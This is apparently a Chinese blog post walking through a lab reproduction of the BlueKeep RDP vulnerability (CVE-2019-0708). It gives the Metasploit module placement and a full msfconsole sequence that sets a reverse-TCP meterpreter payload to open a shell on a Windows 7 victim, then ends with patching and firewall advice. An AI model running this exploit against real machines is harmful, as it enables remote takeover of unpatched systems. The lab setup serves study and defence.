1.影响版本
Windows 7
Windows Server 2008 R2
Windows Server 2008
Windows 2003
Windows XP
2.漏洞描述
Microsoft Windows中存在远程桌面执行代码漏洞,该漏洞源于Microsoft Remote Desktop Services中存在输入验证错误漏洞,网络系统或产品未对输入的数据进行正确的验证。当未经身份验证的攻击者使用 RDP 连接到目标系统并发送经特殊设计的请求时,远程桌面服务(以前称为“终端服务”)中存在远程执行代码漏洞。此漏洞是预身份验证,无需用户交互。成功利用此漏洞的攻击者可以在目标系统上执行任意代码。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。
3.环境准备
镜像:Windows 7 (下载不到的可以评论,我发给你们)
攻击机器:Kali 192.168.157.130
受害机器:win7 sp1:192.168.157.143
4.漏洞复现
1)在Vmware中安装镜像,受害主机开启远程桌面连接服务
2)配置msf,将exp放置到msf对应文件夹下,如果同名直接覆盖(以Kali为例,不一定非得更新,最新的kali有这个攻击模块)
rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb cve_2019_0708_bluekeep_rce.rb ->/opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
3)加载攻击模块,配置参数
root@kali:~# msfconsole msf5 > reload_all # 加载0708exp msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set payload windows/x64/meterpreter/reverse_tcp msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhost 192.168.157.143 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set lhost 192.168.157.130 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set lport 1919 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 2 msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
4)攻击成功,获取shell使用show targets可查看相关选项,设置target我选2,虽然应该选择3,3是VMware,可是选择3会使得目标蓝屏,选2才能反弹shell
5.漏洞修复
1)及时去微软官网打对应系统的安全补丁;
2)关闭3389端口或添加防火墙安全策略限制对3389端口的访问;
3)打不了补丁的可以开启远程桌面(网络级别身份验证(NLA)),可以临时防止漏洞攻击。
免责声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。禁止任何人转载到其他站点,禁止用于任何非法用途。如有任何人凭此做何非法事情,均于笔者无关,特此声明。
来源:freebuf.com 2020-11-05 17:20:07 by: minggege
请登录后发表评论
注册